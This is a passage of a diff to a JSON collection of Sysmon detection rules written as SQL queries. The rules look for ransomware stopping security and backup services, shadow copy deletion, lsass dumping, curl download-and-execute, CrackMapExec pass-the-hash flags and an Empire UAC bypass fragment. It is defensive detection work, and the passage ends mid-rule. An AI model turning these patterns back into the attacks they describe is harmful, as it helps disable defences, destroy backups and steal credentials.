being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { "title": "Suspicious Regsvr32 Execution With Image Extension", @@ -12474,1656 +12115,1627 @@ "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", - "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Command lines that use the same flags" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs 